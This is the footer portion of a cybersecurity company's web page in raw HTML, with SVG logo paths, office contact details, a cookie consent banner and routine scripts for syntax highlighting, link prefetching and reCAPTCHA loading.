<path id="Trazado_4816" data-name="Trazado 4816" d="M6670.242,1626.729l-3.557-6.1h-3.741v6.1h-6.039v-22.991h9.688a8.44,8.44,0,0,1,5.734,14.654l4.874,8.337Zm-7.3-11.312h3.741a3.295,3.295,0,1,0,0-6.59h-3.741Z" transform="translate(-6610.485 -1603.708)" fill="#fff"></path>
<path id="Trazado_4817" data-name="Trazado 4817" d="M6667.714,1603.738h6.041v16.921h8.278v6.07h-14.319Z" transform="translate(-6598.025 -1603.708)" fill="#fff"></path>
<path id="Trazado_4818" data-name="Trazado 4818" d="M6687.2,1603.738a11.5,11.5,0,1,1-11.464,11.526A11.528,11.528,0,0,1,6687.2,1603.738Zm0,6.01a5.486,5.486,0,1,0,5.493,5.485A5.473,5.473,0,0,0,6687.2,1609.749Z" transform="translate(-6588.78 -1603.708)" fill="#fff"></path>
<path id="Trazado_4819" data-name="Trazado 4819" d="M6710.945,1614.377v.857a11.52,11.52,0,1,1-3.407-8.154l-4.259,4.23a5.5,5.5,0,0,0-3.834-1.533,5.457,5.457,0,1,0,4.446,8.648h-4.446v-4.047Z" transform="translate(-6574.662 -1603.708)" fill="#fff"></path>
<path id="Trazado_4820" data-name="Trazado 4820" d="M6700.172,1603.738h6.043v22.991h-6.043Z" transform="translate(-6560.609 -1603.708)" fill="#fff"></path>
<path id="Trazado_4821" data-name="Trazado 4821" d="M6720.231,1611.339a5.368,5.368,0,0,0-3.864-1.5,5.4,5.4,0,1,0,3.864,9.257l4.293,4.23a11.494,11.494,0,1,1-8.157-19.588,11.381,11.381,0,0,1,8.095,3.341Z" transform="translate(-6555.192 -1603.708)" fill="#fff"></path>
</g>
<g id="Grupo_1945" data-name="Grupo 1945" transform="translate(6674.585 1648.134)">
<path id="Trazado_4822" data-name="Trazado 4822" d="M6642.257,1620.231a2.044,2.044,0,0,0-.169-.437,1.217,1.217,0,0,0-.276-.347,1.253,1.253,0,0,0-.4-.226,1.588,1.588,0,0,0-.528-.082,1.542,1.542,0,0,0-.758.179,1.472,1.472,0,0,0-.519.472,2.156,2.156,0,0,0-.295.674,3.1,3.1,0,0,0,0,1.537,2.121,2.121,0,0,0,.295.672,1.494,1.494,0,0,0,.519.474,1.541,1.541,0,0,0,.758.176,1.341,1.341,0,0,0,.568-.112,1.249,1.249,0,0,0,.424-.308,1.453,1.453,0,0,0,.276-.457,2.164,2.164,0,0,0,.131-.562h.938a2.581,2.581,0,0,1-.213.9,2.2,2.2,0,0,1-.486.7,2.144,2.144,0,0,1-.725.457,2.492,2.492,0,0,1-.914.161,2.6,2.6,0,0,1-1.1-.226,2.384,2.384,0,0,1-.826-.618,2.769,2.769,0,0,1-.519-.917,3.482,3.482,0,0,1,0-2.22,2.745,2.745,0,0,1,.519-.917,2.447,2.447,0,0,1,.826-.622,2.56,2.56,0,0,1,1.1-.231,2.938,2.938,0,0,1,.87.127,2.239,2.239,0,0,1,.716.368,1.868,1.868,0,0,1,.5.59,2,2,0,0,1,.238.79Z" transform="translate(-6638.26 -1618.356)" fill="#00bfb3"></path>
<path id="Trazado_4823" data-name="Trazado 4823" d="M6643.512,1621.754l-2.06-3.337h1.115l1.452,2.461,1.431-2.461h1.075l-2.052,3.337v2.153h-.962Z" transform="translate(-6634.58 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4824" data-name="Trazado 4824" d="M6644.831,1618.417h2.669a1.921,1.921,0,0,1,1.185.338,1.369,1.369,0,0,1,.239,1.733,1.3,1.3,0,0,1-.58.459v.015a1.2,1.2,0,0,1,.771.48,1.6,1.6,0,0,1,.26.935,1.583,1.583,0,0,1-.114.6,1.235,1.235,0,0,1-.36.484,1.862,1.862,0,0,1-.633.323,3.088,3.088,0,0,1-.914.121h-2.521Zm.961,2.3h1.567a.852.852,0,0,0,.576-.2.689.689,0,0,0,.23-.564.71.71,0,0,0-.206-.583.921.921,0,0,0-.6-.17h-1.567Zm0,2.407h1.7a.961.961,0,0,0,.682-.226.838.838,0,0,0,.243-.642.8.8,0,0,0-.243-.626.981.981,0,0,0-.682-.219h-1.7Z" transform="translate(-6630.687 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4825" data-name="Trazado 4825" d="M6648.116,1618.417h3.949v.831h-2.99v1.436h2.77v.786h-2.77v1.606h3.044v.831h-4Z" transform="translate(-6626.897 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4826" data-name="Trazado 4826" d="M6651.139,1618.417h2.621a2.028,2.028,0,0,1,1.36.392,1.367,1.367,0,0,1,.452,1.091,1.579,1.579,0,0,1-.114.65,1.439,1.439,0,0,1-.27.413,1.063,1.063,0,0,1-.3.229c-.1.045-.176.077-.22.092v.015a.99.99,0,0,1,.264.077.765.765,0,0,1,.266.2,1.052,1.052,0,0,1,.2.349,1.524,1.524,0,0,1,.081.538,4.776,4.776,0,0,0,.074.881,1.13,1.13,0,0,0,.227.566h-1.032a.949.949,0,0,1-.126-.394c-.014-.142-.019-.28-.019-.413a4.007,4.007,0,0,0-.046-.65,1.136,1.136,0,0,0-.171-.454.7.7,0,0,0-.333-.265,1.488,1.488,0,0,0-.543-.084H6652.1v2.26h-.958Zm.958,2.5h1.577a1.014,1.014,0,0,0,.7-.218.858.858,0,0,0,.238-.658,1.019,1.019,0,0,0-.078-.427.613.613,0,0,0-.21-.256.786.786,0,0,0-.309-.125,2.176,2.176,0,0,0-.356-.03H6652.1Z" transform="translate(-6623.417 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4827" data-name="Trazado 4827" d="M6655.229,1622.147a1.24,1.24,0,0,0,.107.538.962.962,0,0,0,.3.364,1.322,1.322,0,0,0,.443.209,2.174,2.174,0,0,0,.541.064,1.707,1.707,0,0,0,.537-.073,1.088,1.088,0,0,0,.362-.187.691.691,0,0,0,.2-.267.788.788,0,0,0,.063-.3.66.66,0,0,0-.142-.465.835.835,0,0,0-.312-.211,6.886,6.886,0,0,0-.68-.2c-.259-.062-.58-.146-.959-.25a2.068,2.068,0,0,1-.588-.241,1.405,1.405,0,0,1-.372-.336,1.16,1.16,0,0,1-.2-.392,1.537,1.537,0,0,1-.058-.422,1.448,1.448,0,0,1,.171-.719,1.571,1.571,0,0,1,.459-.5,1.993,1.993,0,0,1,.646-.295,2.809,2.809,0,0,1,.729-.1,2.848,2.848,0,0,1,.812.112,1.992,1.992,0,0,1,.67.334,1.6,1.6,0,0,1,.627,1.307h-.963a.927.927,0,0,0-.36-.749,1.436,1.436,0,0,0-.824-.22,1.724,1.724,0,0,0-.344.037,1.04,1.04,0,0,0-.323.114.7.7,0,0,0-.243.219.666.666,0,0,0,.085.8,1.175,1.175,0,0,0,.474.25l.241.065c.142.039.3.082.473.127s.345.093.513.136.284.075.356.094a1.583,1.583,0,0,1,.468.233,1.528,1.528,0,0,1,.337.333,1.439,1.439,0,0,1,.265.833,1.555,1.555,0,0,1-.188.788,1.606,1.606,0,0,1-.5.536,2.138,2.138,0,0,1-.7.3,3.422,3.422,0,0,1-.8.094,3.358,3.358,0,0,1-.885-.114,2.084,2.084,0,0,1-.723-.355,1.736,1.736,0,0,1-.492-.609,2.037,2.037,0,0,1-.19-.881Z" transform="translate(-6619.805 -1618.356)" fill="#00bfb3"></path>
<path id="Trazado_4828" data-name="Trazado 4828" d="M6657.508,1618.417h3.951v.831h-2.989v1.436h2.768v.786h-2.768v1.606h3.044v.831h-4.006Z" transform="translate(-6616.071 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4829" data-name="Trazado 4829" d="M6664.391,1620.231a1.994,1.994,0,0,0-.169-.437,1.2,1.2,0,0,0-.277-.347,1.242,1.242,0,0,0-.4-.226,1.572,1.572,0,0,0-.528-.082,1.527,1.527,0,0,0-.755.179,1.44,1.44,0,0,0-.519.472,2.184,2.184,0,0,0-.3.674,3.2,3.2,0,0,0,0,1.537,2.147,2.147,0,0,0,.3.672,1.461,1.461,0,0,0,.519.474,1.527,1.527,0,0,0,.755.176,1.341,1.341,0,0,0,.568-.112,1.248,1.248,0,0,0,.426-.308,1.467,1.467,0,0,0,.274-.457,2.164,2.164,0,0,0,.132-.562h.938a2.6,2.6,0,0,1-.211.9,2.237,2.237,0,0,1-.489.7,2.127,2.127,0,0,1-.723.457,2.51,2.51,0,0,1-.916.161,2.587,2.587,0,0,1-1.1-.226,2.457,2.457,0,0,1-.828-.618,2.784,2.784,0,0,1-.518-.917,3.482,3.482,0,0,1,0-2.22,2.76,2.76,0,0,1,.518-.917,2.524,2.524,0,0,1,.828-.622,2.552,2.552,0,0,1,1.1-.231,2.924,2.924,0,0,1,.87.127,2.265,2.265,0,0,1,.719.368,1.9,1.9,0,0,1,.5.59,2.03,2.03,0,0,1,.237.79Z" transform="translate(-6612.745 -1618.356)" fill="#00bfb3"></path>
<path id="Trazado_4830" data-name="Trazado 4830" d="M6663.85,1618.417h.96v3.2a5.2,5.2,0,0,0,.028.56,1.263,1.263,0,0,0,.153.51.973.973,0,0,0,.383.375,1.507,1.507,0,0,0,.729.146,1.473,1.473,0,0,0,.724-.146.972.972,0,0,0,.387-.375,1.312,1.312,0,0,0,.155-.51c.018-.189.025-.377.025-.56v-3.2h.96v3.513a2.393,2.393,0,0,1-.159.921,1.792,1.792,0,0,1-.459.659,1.944,1.944,0,0,1-.71.4,3.368,3.368,0,0,1-1.846,0,1.917,1.917,0,0,1-.711-.4,1.79,1.79,0,0,1-.458-.659,2.41,2.41,0,0,1-.161-.921Z" transform="translate(-6608.76 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4831" data-name="Trazado 4831" d="M6667.228,1618.417h2.622a2.025,2.025,0,0,1,1.36.392,1.365,1.365,0,0,1,.453,1.091,1.579,1.579,0,0,1-.114.65,1.38,1.38,0,0,1-.27.413,1.037,1.037,0,0,1-.3.229c-.1.045-.173.077-.22.092v.015a1.006,1.006,0,0,1,.265.077.775.775,0,0,1,.266.2,1.051,1.051,0,0,1,.2.349,1.545,1.545,0,0,1,.082.538,4.781,4.781,0,0,0,.073.881,1.139,1.139,0,0,0,.226.566h-1.031a.9.9,0,0,1-.126-.394c-.013-.142-.018-.28-.018-.413a4.11,4.11,0,0,0-.047-.65,1.081,1.081,0,0,0-.172-.454.691.691,0,0,0-.332-.265,1.484,1.484,0,0,0-.543-.084h-1.415v2.26h-.96Zm.96,2.5h1.575a1.007,1.007,0,0,0,.7-.218.848.848,0,0,0,.238-.658.991.991,0,0,0-.076-.427.592.592,0,0,0-.21-.256.78.78,0,0,0-.309-.125,2.182,2.182,0,0,0-.358-.03h-1.561Z" transform="translate(-6604.866 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4832" data-name="Trazado 4832" d="M6670.514,1618.417h.961v5.49h-.961Z" transform="translate(-6601.081 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4833" data-name="Trazado 4833" d="M6672.036,1618.417h4.443v.831h-1.747v4.659h-.96v-4.659h-1.736Z" transform="translate(-6599.325 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4834" data-name="Trazado 4834" d="M6676.934,1621.754l-2.06-3.337h1.114l1.453,2.461,1.43-2.461h1.076l-2.054,3.337v2.153h-.96Z" transform="translate(-6596.052 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4835" data-name="Trazado 4835" d="M6680.016,1618.417h3.953v.831h-2.99v1.436h2.766v.786h-2.766v1.606h3.044v.831h-4.007Z" transform="translate(-6590.125 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4836" data-name="Trazado 4836" d="M6682.888,1618.417h1.146l1.245,1.938,1.3-1.937h1.076l-1.813,2.643,1.942,2.846h-1.166l-1.369-2.1-1.39,2.1h-1.1l1.947-2.846Z" transform="translate(-6586.968 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4837" data-name="Trazado 4837" d="M6686.123,1618.417h2.421a2.31,2.31,0,0,1,.953.168,1.475,1.475,0,0,1,.568.424,1.391,1.391,0,0,1,.273.553,2.31,2.31,0,0,1,.074.553,2.237,2.237,0,0,1-.074.549,1.416,1.416,0,0,1-.273.551,1.45,1.45,0,0,1-.568.417,2.313,2.313,0,0,1-.953.166h-1.461v2.108h-.96Zm.96,2.6h1.407a1.209,1.209,0,0,0,.331-.047.965.965,0,0,0,.312-.149.75.75,0,0,0,.229-.278.954.954,0,0,0,.089-.435,1.1,1.1,0,0,0-.078-.446.72.72,0,0,0-.205-.28.75.75,0,0,0-.3-.142,1.613,1.613,0,0,0-.361-.038h-1.422Z" transform="translate(-6583.085 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4838" data-name="Trazado 4838" d="M6689.275,1618.417h3.951v.831h-2.989v1.436H6693v.786h-2.767v1.606h3.044v.831h-4.006Z" transform="translate(-6579.45 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4839" data-name="Trazado 4839" d="M6692.3,1618.417h2.623a2.03,2.03,0,0,1,1.36.392,1.364,1.364,0,0,1,.452,1.091,1.6,1.6,0,0,1-.113.65,1.419,1.419,0,0,1-.27.413,1.053,1.053,0,0,1-.3.229c-.1.045-.174.077-.22.092v.015a1,1,0,0,1,.266.077.781.781,0,0,1,.265.2,1.086,1.086,0,0,1,.2.349,1.551,1.551,0,0,1,.079.538,4.952,4.952,0,0,0,.074.881,1.166,1.166,0,0,0,.228.566h-1.03a.886.886,0,0,1-.128-.394c-.012-.142-.019-.28-.019-.413a4.121,4.121,0,0,0-.046-.65,1.107,1.107,0,0,0-.17-.454.71.71,0,0,0-.334-.265,1.482,1.482,0,0,0-.542-.084h-1.414v2.26h-.962Zm.962,2.5h1.575a1.006,1.006,0,0,0,.7-.218.848.848,0,0,0,.239-.658,1,1,0,0,0-.077-.427.6.6,0,0,0-.211-.256.768.768,0,0,0-.309-.125,2.173,2.173,0,0,0-.358-.03h-1.559Z" transform="translate(-6575.968 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4840" data-name="Trazado 4840" d="M6695.276,1618.417h4.443v.831h-1.744v4.659h-.963v-4.659h-1.736Z" transform="translate(-6572.536 -1618.286)" fill="#00bfb3"></path>
<path id="Trazado_4841" data-name="Trazado 4841" d="M6699.216,1622.147a1.2,1.2,0,0,0,.108.538.971.971,0,0,0,.3.364,1.321,1.321,0,0,0,.441.209,2.19,2.19,0,0,0,.543.064,1.718,1.718,0,0,0,.538-.073,1.083,1.083,0,0,0,.361-.187.691.691,0,0,0,.2-.267.8.8,0,0,0,.06-.3.664.664,0,0,0-.142-.465.817.817,0,0,0-.312-.211,6.807,6.807,0,0,0-.68-.2q-.39-.094-.957-.25a2.037,2.037,0,0,1-.587-.241,1.338,1.338,0,0,1-.373-.336,1.147,1.147,0,0,1-.2-.392,1.615,1.615,0,0,1-.058-.422,1.418,1.418,0,0,1,.174-.719,1.525,1.525,0,0,1,.458-.5,1.955,1.955,0,0,1,.644-.295,2.9,2.9,0,0,1,1.543.015,2,2,0,0,1,.668.334,1.57,1.57,0,0,1,.626,1.307h-.96a.931.931,0,0,0-.362-.749,1.431,1.431,0,0,0-.821-.22,1.77,1.77,0,0,0-.348.037,1.011,1.011,0,0,0-.321.114.7.7,0,0,0-.242.219.576.576,0,0,0-.1.344.594.594,0,0,0,.182.458,1.16,1.16,0,0,0,.475.25l.239.065c.143.039.3.082.474.127l.511.136c.168.043.285.075.358.094a1.618,1.618,0,0,1,.47.233,1.422,1.422,0,0,1,.6,1.167,1.566,1.566,0,0,1-.188.788,1.618,1.618,0,0,1-.5.536,2.18,2.18,0,0,1-.7.3,3.441,3.441,0,0,1-.8.094,3.331,3.331,0,0,1-.885-.114,2.077,2.077,0,0,1-.725-.355,1.783,1.783,0,0,1-.493-.609,2.1,2.1,0,0,1-.191-.881Z" transform="translate(-6569.102 -1618.356)" fill="#00bfb3"></path>
</g>
</g>
</svg>
</div>
<div>
<h6 class="footer_info__title">CONTACT INFO</h6>
<div class="footer_info__contact">
<p>Santiago de Compostela<br /> Travesía do Montouto Nº1,<br /> Teo, A Coruña.<br /> C.P.15894<br /> (0034) 912 919 319<br /> <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="4724282933262433073326352b28202e246924282a">[email&#160;protected]</a></p> </div>
<div class="footer_info__contact">
<p>Madrid<br /> Quintanapalla 8,<br /> Las Tablas, 28050<br /> (0034) 912 919 319<br /> <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="0f6c60617b6e6c7b4f7b6e7d636068666c216c6062">[email&#160;protected]</a></p> </div>
</div>
<div>
<h6 class="footer_info__title">LINKS</h6>
<nav class="footer_info__menu">
<ul class="footer__menu"><li id="menu-item-23195" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23195"><a href="https://www.tarlogic.com/cybersecurity-company/">Company</a></li><li id="menu-item-23196" class="menu-item menu-item-type-post_type_archive menu-item-object-actualidad menu-item-23196"><a href="https://www.tarlogic.com/news/">News</a></li><li id="menu-item-23197" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23197"><a href="https://www.tarlogic.com/cybersecurity-products/">Products</a></li><li id="menu-item-23213" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23213"><a href="https://www.tarlogic.com/talent/">Talent</a></li></ul> </nav>
</div>
<div>
<div class="footer_info__social">
<a href="https://www.linkedin.com/company/tarlogic" rel="nofollow noopener noreferrer" title="Linkedin" aria-label="Linkedin" target="_blank">
<svg xmlns="http://www.w3.org/2000/svg" width="67.125" height="67.125" viewBox="0 0 67.125 67.125">
<path d="M67.125,33.562A33.563,33.563,0,1,1,33.563,0,33.562,33.562,0,0,1,67.125,33.562Z" fill="#fafafa" />
<path d="M11.635,20.779h0l-4.431,0q0-1.213,0-2.423c0-3.956.01-8.047-.106-12.086h3.844l.208,2.043h.07a5.177,5.177,0,0,1,4.431-2.355c3.21,0,5.126,2.343,5.126,6.266v8.553l-4.468,0V12.743c0-2.091-.757-3.151-2.25-3.151a2.481,2.481,0,0,0-2.287,1.7,3.286,3.286,0,0,0-.137,1.143v8.348Zm-7.1,0H.1V6.268H4.537v14.51ZM2.285,4.5A2.194,2.194,0,0,1,0,2.25,2.229,2.229,0,0,1,2.355,0a2.211,2.211,0,0,1,2.32,2.25A2.223,2.223,0,0,1,2.285,4.5Z" transform="translate(23.973 22.375)" fill="#002e5d" />
</svg>
</a>
<a href="https://twitter.com/tarlogic" rel="nofollow noopener noreferrer" title="Twitter" aria-label="Twitter" target="_blank">
<svg xmlns="http://www.w3.org/2000/svg" width="67" height="67" viewBox="0 0 67 67">
<g transform="translate(0 0.001)">
<circle cx="33.5" cy="33.5" r="33.5" transform="translate(0 -0.001)" fill="#fafafa" />
<path d="M16.523,2.249h0a3.171,3.171,0,0,0-2.781-.964h0A3.149,3.149,0,0,0,15.378.643c0-.161,0-.321-.164-.321a3.127,3.127,0,0,0-1.309.321C14.4.321,14.56.161,14.56,0a3.075,3.075,0,0,0-1.636.8c.164-.321.327-.482.164-.643A1.266,1.266,0,0,0,12.433.8a3.373,3.373,0,0,0-.982,1.285h0A14.04,14.04,0,0,0,9.979,5.3H9.816A3.839,3.839,0,0,0,8.343,4.016,16.776,16.776,0,0,0,5.889,2.731,17.909,17.909,0,0,0,2.781,1.446,2.973,2.973,0,0,0,4.417,4.176h0a2.831,2.831,0,0,0-1.145.161c0,.964.818,1.767,2.29,2.088h0a2.672,2.672,0,0,0-1.472.482c.491.964,1.309,1.285,2.618,1.285a2.358,2.358,0,0,1-.491.321.7.7,0,0,0-.164.8c.327.482.654.643,1.472.643h0a5.267,5.267,0,0,1-4.254,1.606h0A5.32,5.32,0,0,1,0,10.12a10.817,10.817,0,0,0,4.744,3.695,11.951,11.951,0,0,0,6.707.161h0a11.687,11.687,0,0,0,5.562-3.695,7.577,7.577,0,0,0,1.309-2.891,2.9,2.9,0,0,0,2.454-.964h0a3.922,3.922,0,0,1-2.29-.161h0c1.145-.161,1.963-.482,2.127-1.124a3.245,3.245,0,0,1-2.454,0,4.388,4.388,0,0,0-1.636-2.891Z" transform="translate(22.247 27.169)" fill="#002e5d" />
</g>
</svg>
</a>
</div>
</div>
</div>
<div class="wrapper copyright">
<p>© 2021 all rights reserved <span>Tarlogic | Cybersecurity and Cyber intelligence experts</span></p>
<p><a href="https://www.tarlogic.com/privacy-policy/">Privacy policy</a> - <a href="https://www.tarlogic.com/legal-notice/">Legal notice</a> - <a href="https://www.tarlogic.com/management-policy/">Management policy</a></p>
</div>
</div>
</div>
</footer>
<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript">/* <![CDATA[ */!function(e,n){var r={"selectors":{"block":"pre.EnlighterJSRAW","inline":"code.EnlighterJSRAW"},"options":{"indent":4,"ampersandCleanup":true,"linehover":true,"rawcodeDbclick":false,"textOverflow":"scroll","linenumbers":true,"theme":"enlighter","language":"generic","retainCssClasses":false,"collapse":false,"toolbarOuter":"","toolbarTop":"{BTN_RAW}{BTN_COPY}{BTN_WINDOW}{BTN_WEBSITE}","toolbarBottom":""},"resources":["https:\/\/www.tarlogic.com\/wp-content\/plugins\/enlighter\/cache\/enlighterjs.min.css?zqhD9AIZexpYfaq","https:\/\/www.tarlogic.com\/wp-content\/plugins\/enlighter\/resources\/enlighterjs\/enlighterjs.min.js"]},o=document.getElementsByTagName("head")[0],t=n&&(n.error||n.log)||function(){};e.EnlighterJSINIT=function(){!function(e,n){var r=0,l=null;function c(o){l=o,++r==e.length&&(!0,n(l))}e.forEach(function(e){switch(e.match(/\.([a-z]+)(?:[#?].*)?$/)[1]){case"js":var n=document.createElement("script");n.onload=function(){c(null)},n.onerror=c,n.src=e,n.async=!0,o.appendChild(n);break;case"css":var r=document.createElement("link");r.onload=function(){c(null)},r.onerror=c,r.rel="stylesheet",r.type="text/css",r.href=e,r.media="all",o.appendChild(r);break;default:t("Error: invalid file extension",e)}})}(r.resources,function(e){e?t("Error: failed to dynamically load EnlighterJS resources!",e):"undefined"!=typeof EnlighterJS?EnlighterJS.init(r.selectors.block,r.selectors.inline,r.options):t("Error: EnlighterJS resources not loaded yet!")})},(document.querySelector(r.selectors.block)||document.querySelector(r.selectors.inline))&&e.EnlighterJSINIT()}(window,console); /* ]]> */</script><link data-minify="1" rel='stylesheet' id='tar-images-ligthbox-css' href='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/themes/Avada-Child-Theme/assets/css/2_components/image_ligthbox-0306dc33322acccbd52a36d6d4115164.css' type='text/css' media='all' />
<script type='text/javascript' id='quicklink-js-before'>
var quicklinkOptions = {"el":"","urls":[],"timeout":2000,"timeoutFn":"requestIdleCallback","priority":false,"origins":["www.tarlogic.com"],"ignores":["feed\\=","\\\/feed\\\/","^https?:\\\/\\\/[^\\\/]+\\\/blog\\\/how\\-to\\-attack\\-kerberos\\\/(#.*)?$","^https\\:\\\/\\\/www\\.tarlogic\\.com\\\/wp\\-admin\\\/","^https\\:\\\/\\\/www\\.tarlogic\\.com[^?#]+\\.php","\\\/wp\\-content",".*\\?.+"]};
</script>
<script type='text/javascript' src='https://www.tarlogic.com/wp-content/plugins/quicklink/quicklink.min.js?ver=0.9.1' id='quicklink-js' async></script>
<script data-minify="1" type='text/javascript' src='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/themes/Avada-Child-Theme/assets/js/vendor/lazysizes-78d5bc4415cfaa240d4a83785dd18713.js' id='tar-lazysizes-js'></script>
<script data-minify="1" type='text/javascript' src='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/themes/Avada-Child-Theme/assets/js/menu_handler-cb26acfc503ff35df0084cf16b5e903f.js' id='tar-menu-handler-js'></script>
<script data-minify="1" type='text/javascript' src='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/plugins/info-cookies/public/assets/js/cookies_bar-b09de92f8333b876a6f3ea8a0e704c82.js' id='infocookies-bar-script-js'></script>
<script data-minify="1" type='text/javascript' src='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/themes/Avada-Child-Theme/assets/js/image_ligthbox-9b6b5aaf308931a7e8434ce32fc964ea.js' id='tar-images-ligthbox-js'></script>
<script data-minify="1" async="async" type='text/javascript' src='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/plugins/akismet/_inc/form-5ecac2e2b9f5dbe28cd356f317864d48.js' id='akismet-form-js'></script>
<script data-minify="1" type='text/javascript' src='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/themes/Avada-Child-Theme/assets/js/footer_map_offices-8eea7a357c048fd9c718eb16270d4b54.js' id='tar-footer_map_offices-js'></script>
<link data-minify="1" rel="stylesheet" href="https://www.tarlogic.com/wp-content/cache/min/1/wp-content/plugins/info-cookies/public/assets/css/cookies_bar-dd074c9f863efcdd75b48f438a270bfc.css" media="all" />
<div id="js-tar_cookiesBar" class="tar_cookiesBar">
<div class="tar_cookiesBar__container">
<div class="tar_cookiesBar__text">
<p>We are using cookies to give you the best experience on our website. You can find out more about which cookies we are using or switch them off in <a id="js-tarOpenModal" href="javascript://" class="tar_cookiesBar__link">Cookies Settings</a></p>
</div>
<button id="js-tar_cookiesAccepted" class="tar_cookiesBar__btn">I agree</button>
</div>
</div>
<div id="js-tarModal" class="tar_modal">
<div class="tar_modal__container">
<div id="js-tarCloseModal" class="tar_modal__close">
<i class="fa fa-times">+</i>
</div>
<div class="tar_modal__content">
<h6 class="tar_modal__subtitle">Necesary</h6>
<p class="tar_cookies_info">Strictly Necessary Cookie should be enabled at all times so that we can save your preferences for cookie settings.</p>
<label class="toggle" style="pointer-events:none;">
<input id="js-necesary_cookies_chkbox" class="toggle-checkbox" type="checkbox" checked>
<div class="toggle-switch"></div>
<span class="toggle-label">Necesary cookies</span>
</label>
<h6 class="tar_modal__subtitle">3rd Party Cookies</h6>
<p class="tar_cookies_info">This website uses Google Analytics to collect anonymous information such as the number of visitors to the site, and the most popular pages.
Keeping this cookie enabled helps us to improve our website.</p>
<label class="toggle">
<input id="js-third_party_cookies_chkbox" class="toggle-checkbox" type="checkbox">
<div class="toggle-switch"></div>
<span class="toggle-label">3rd party cookies</span>
</label>
</div>
<div style="display: flex; justify-content: flex-start; flex-direction: row-reverse;">
<button class="tar_modal__btn" id="js-enable-all">Enable all</button>
<button class="tar_modal__btn tar_modal__btn--secondary" id="js-save-settings">Save settings</button>
</div>
</div>
</div>
<script>
      window.addEventListener('DOMContentLoaded', function() {
        var fired = false;
        var target = document.querySelector(".wpcf7");
        var observer;

        function setUpCF7Captcha() {
          if (!target) return;

          function loadNeededResources() {
            if (!("Promise" in window)) {
              loadScriptsPolyfills(
                "https://cdn.jsdelivr.net/bluebird/latest/bluebird.core.min.js",
                function() {
                  loadScriptsPolyfills(
                    "https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/assets/js/load_resources.js",
                    function() {
                      loadNeededResources();
                    }
                  );
                }
              );
            } else {
              loadScriptsPolyfills(
                "https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/assets/js/load_resources.js",
                loadNeededResources
              );
            }

            function loadNeededResources() {
              if (!("IntersectionObserver" in window)) {
                load
                  .js(
                    "https://cdn.jsdelivr.net/npm/intersection-observer-polyfill@0.1.0/dist/IntersectionObserver.js"
                  )
                  .then(function() {
                    formWillLoad();
                  });
              } else {
                formWillLoad();
              }
            }
          }
          loadNeededResources()

          function formWillLoad() {

            observer = new IntersectionObserver(loadForm);
            observer.observe(target);
          }

          function loadForm(observerData) {

            if (fired || observerData[0].isIntersecting === false) return;
            load
              .js(
                "https://www.google.com/recaptcha/api.js?render=6Ldq5_IUAAAAAK-FU3AdCmtmnV7p9GnY1UY1-MZR&ver=3.0"
              )
              .then(function() {

                var wpcf7_recaptcha = {
                  "sitekey": "6Ldq5_IUAAAAAK-FU3AdCmtmnV7p9GnY1UY1-MZR",
                  "actions": {
                    "homepage": "homepage",
                    "contactform": "contactform"
                  }
                };

                wpcf7_recaptcha.execute = function(action) {
                  grecaptcha.execute(
                    wpcf7_recaptcha.sitekey, {
                      action: action
                    }
                  ).then(function(token) {
                    var event = new CustomEvent('wpcf7grecaptchaexecuted', {
                      detail: {
                        action: action,
                        token: token,
                      },
                    });

                    document.dispatchEvent(event);
                  });
                };

                wpcf7_recaptcha.execute_on_homepage = function() {
                  wpcf7_recaptcha.execute(wpcf7_recaptcha.actions['homepage']);
                };

                wpcf7_recaptcha.execute_on_contactform = function() {
                  wpcf7_recaptcha.execute(wpcf7_recaptcha.actions['contactform']);
                };

                grecaptcha.ready(
                  wpcf7_recaptcha.execute_on_homepage
                );

                document.addEventListener('change',
                  wpcf7_recaptcha.execute_on_contactform
                );

                document.addEventListener('wpcf7submit',
                  wpcf7_recaptcha.execute_on_homepage
                );


                document.addEventListener('wpcf7grecaptchaexecuted', function(event) {
                  var fields = document.querySelectorAll(
                    "form.wpcf7-form input[name='_wpcf7_recaptcha_response']"
                  );

                  for (var i = 0; i < fields.length; i++) {
                    var field = fields[i];
                    field.setAttribute('value', event.detail.token);
                  }
                });

                fired = true;
                observer.unobserve(target);

              });
          }
        }
        setUpCF7Captcha();
      })
    </script>
